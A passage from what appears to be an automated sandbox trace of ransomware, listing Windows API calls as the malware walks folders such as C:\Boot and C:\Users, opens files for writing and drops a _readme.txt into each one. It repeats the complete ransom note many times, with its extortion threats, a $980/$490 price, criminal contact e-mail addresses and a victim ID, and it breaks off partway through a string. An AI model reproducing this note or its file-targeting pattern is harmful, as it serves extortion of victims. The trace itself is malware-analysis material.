lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.998] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.999] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.999] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.000] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.000] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0210.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.000] PathFindFileNameW (pszPath="") returned="" [0210.000] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.001] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.001] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.001] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.001] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.001] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0210.001] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.001] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.002] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.002] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.002] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.002] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0210.002] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.002] PathFindFileNameW (pszPath="") returned="" [0210.002] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.002] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.003] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.003] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.003] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0210.003] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0210.003] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.003] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.003] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.004] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.004] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0210.004] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.004] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.004] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.004] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.004] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0210.004] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.004] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.004] PathFindFileNameW (pszPath="") returned="" [0210.004] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.005] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.005] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.005] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.005] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0210.005] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0210.005] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.006] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.006] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.006] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.006] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0210.006] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.006] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.006] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.007] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.007] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0210.007] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.007] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.007] PathFindFileNameW (pszPath="") returned="" [0210.007] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.007] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.007] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.007] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.008] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0210.008] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0210.008] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 